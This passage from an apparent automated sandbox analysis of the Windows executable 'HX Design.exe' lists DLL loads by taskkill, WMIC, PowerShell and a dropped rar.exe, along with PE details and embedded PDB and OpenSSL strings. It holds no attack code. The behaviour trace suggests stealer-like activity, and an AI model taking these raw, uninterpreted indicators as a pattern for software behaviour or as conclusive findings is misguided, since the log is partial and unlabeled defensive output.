              Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: HX Design.exeStatic PE information: certificate valid
              Source: HX Design.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: HX Design.exeStatic file information: File size 9441536 > 1048576
              Source: HX Design.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: HX Design.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: HX Design.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: HX Design.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: HX Design.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: HX Design.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: HX Design.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: HX Design.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HX Design.exe, 00000001.00000002.2110666490.00007FFE11501000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: >c.pdb source: powershell.exe, 00000028.00000002.1946049803.000001D19A990000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: HX Design.exe, 00000001.00000002.2111613092.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdbhP8 source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HX Design.exe, 00000001.00000002.2109362535.00007FFE0E15E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 